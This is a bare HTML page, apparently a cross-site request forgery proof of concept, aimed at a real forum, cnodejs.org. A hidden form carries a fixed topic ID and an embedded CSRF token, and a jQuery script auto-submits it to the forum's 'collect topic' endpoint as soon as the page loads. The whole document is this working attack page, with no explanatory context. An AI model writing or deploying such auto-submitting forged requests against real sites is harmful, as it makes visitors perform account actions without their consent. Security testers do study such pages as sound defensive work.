<form action="https://cnodejs.org/topic/collect" method="POST">
        <input type="text" name="topic_id" value="5cbfd9aca86ae80ce64b3175">
        <input type="text" name="_csrf" value="nnHBnwhO-Gk13e3fL5ppkpTtCZJ-tfAoB_MQ">
      </form>

       <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>
     <script>
       $('form').submit();
     </script>